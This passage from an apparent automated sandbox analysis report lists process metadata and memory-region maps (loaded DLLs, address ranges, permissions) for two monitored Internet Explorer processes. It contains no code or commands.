Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x69C, 0x6A0, 0x6C8, 0x270, 0x720, 0x728, 0x734, 0x740, 0x724, 0x7D0, 0x4E8, 0x450, 0x53C, 0x540, 0x7C4, 0x7B0, 0x7AC, 0x3B8, 0x320
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x0002ffff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe.mui 0x000e0000 0x000e1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00110000 0x00110fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00160000 0x0016bfff Memory Mapped File Readable, Writable True True False
index.dat 0x00160000 0x0016ffff Memory Mapped File Readable, Writable True True False
index.dat 0x00170000 0x00177fff Memory Mapped File Readable, Writable True True False
index.dat 0x00180000 0x0018ffff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002b0000 0x002b0000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000640000 0x00640000 0x0067ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000680000 0x00680000 0x0075efff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000860000 0x00860000 0x009e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009f0000 0x009f0000 0x00b70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b80000 0x00b80000 0x00bedfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x00c4cfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000c50000 0x00c50000 0x00c8ffff Private Memory Readable, Writable True False False -
private_0x0000000000cf0000 0x00cf0000 0x00cfffff Private Memory Readable, Writable True False False -
private_0x0000000000d00000 0x00d00000 0x00d3ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x00d50000 0x00df5fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000e00000 0x00e00000 0x021fffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02200000 0x024cefff Memory Mapped File Readable False False False -
private_0x00000000024d0000 0x024d0000 0x025cffff Private Memory Readable, Writable True False False -
private_0x0000000002610000 0x02610000 0x0264ffff Private Memory Readable, Writable True False False -
private_0x0000000002650000 0x02650000 0x0268ffff Private Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026effff Private Memory Readable, Writable True False False -
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False -
private_0x0000000002800000 0x02800000 0x0283ffff Private Memory Readable, Writable True False False -
private_0x0000000002860000 0x02860000 0x0295ffff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x029fffff Private Memory Readable, Writable True False False -
private_0x0000000002a20000 0x02a20000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02bbffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02cdffff Private Memory Readable, Writable True False False -
private_0x0000000002d30000 0x02d30000 0x02d6ffff Private Memory Readable, Writable True False False -
private_0x0000000002d80000 0x02d80000 0x02e7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002e80000 0x02e80000 0x031c2fff Pagefile Backed Memory Readable True False False -
private_0x0000000003240000 0x03240000 0x0333ffff Private Memory Readable, Writable True False False -
private_0x0000000003400000 0x03400000 0x034fffff Private Memory Readable, Writable True False False -
private_0x0000000003500000 0x03500000 0x035fffff Private Memory Readable, Writable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x725d0000 0x7304ffff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73470000 0x734a2fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x734b0000 0x734c2fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x734d0000 0x7350bfff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x735e0000 0x735e5fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x735f0000 0x735f8fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73600000 0x73637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x73640000 0x73645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x73650000 0x73654fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736abfff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x736e0000 0x736e7fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x73700000 0x73759fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x73780000 0x7378cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x73790000 0x737a4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x737b0000 0x73801fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75410000 0x7548afff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 170 entries are omitted.
The remaining entries can be found in flog.txt.
Process #34: iexplore.exe
Information Value
ID #34
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1680 CREDAT:14337
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:03:25, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:55
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x22c
Parent PID 0x690 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0x138, 0x1C0, 0x44C, 0x700, 0x5E0, 0x478, 0x474, 0x328, 0x604, 0x7C0, 0x7C8, 0x7B8, 0x7B4, 0x7A8, 0x584, 0x5E4, 0x3B0, 0x420
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00180000 0x00180fff Memory Mapped File Readable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable True False False -
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x0042dfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000430000 0x00430000 0x00430fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x006e0000 0x006fffff Memory Mapped File Readable True False False -
private_0x0000000000700000 0x00700000 0x0070ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000710000 0x00710000 0x00890fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x008a0000 0x00b6efff Memory Mapped File Readable False False False -
pagefile_0x0000000000b70000 0x00b70000 0x00c4efff Pagefile Backed Memory Readable True False False -
private_0x0000000000c50000 0x00c50000 0x00c51fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000c60000 0x00c60000 0x00c61fff Pagefile Backed Memory Readable True False False -
index.dat 0x00c70000 0x00c7bfff Memory Mapped File Readable, Writable True True False
index.dat 0x00c70000 0x00c7ffff Memory Mapped File Readable, Writable True True False
index.dat 0x00c80000 0x00c87fff Memory Mapped File Readable, Writable True True False
index.dat 0x00c90000 0x00c9ffff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000ca0000 0x00ca0000 0x00ca0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000cb0000 0x00cb0000 0x00ceffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000cf0000 0x00cf0000 0x00cf0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000d00000 0x00d00000 0x00d3ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x00d50000 0x00df5fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000e00000 0x00e00000 0x021fffff Pagefile Backed Memory Readable True False False -
private_0x0000000002210000 0x02210000 0x02211fff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0223ffff Private Memory Readable, Writable True False False -
private_0x0000000002240000 0x02240000 0x0227ffff Private Memory Readable, Writable True False False -
private_0x00000000022a0000 0x022a0000 0x022dffff Private Memory Readable, Writable True False False -
private_0x0000000002310000 0x02310000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002380000 0x02380000 0x0247ffff Private Memory Readable, Writable True False False -
private_0x00000000024b0000 0x024b0000 0x024effff Private Memory Readable, Writable True False False -
private_0x00000000024f0000 0x024f0000 0x025effff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0275ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x028effff Private Memory Readable, Writable True False False -
private_0x0000000002920000 0x02920000 0x02a1ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02a9ffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable True False False -
private_0x0000000002b80000 0x02b80000 0x02d7ffff Private Memory Readable, Writable True False False -
private_0x0000000002da0000 0x02da0000 0x02e9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002ea0000 0x02ea0000 0x03292fff Pagefile Backed Memory Readable True False False -
private_0x00000000032b0000 0x032b0000 0x032effff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033dffff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x0354ffff Private Memory Readable, Writable True False False -
private_0x00000000036c0000 0x036c0000 0x037bffff Private Memory Readable, Writable True False False -
staticcache.dat 0x037c0000 0x040effff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
comctl32.dll 0x72260000 0x722e3fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x72360000 0x72454fff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x725d0000 0x7304ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x733d0000 0x73472fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x734b0000 0x734c2fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x734d0000 0x7350bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x73920000 0x739adfff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x739b0000 0x739dafff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x73aa0000 0x73ab0fff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73ac0000 0x73af2fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x73ac0000 0x73aedfff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x73b00000 0x73b34fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x750a0000 0x750ebfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75270000 0x7540cfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75410000 0x7548afff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75770000 0x75781fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e50000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 159 entries are omitted.
The remaining entries can be found in flog.txt.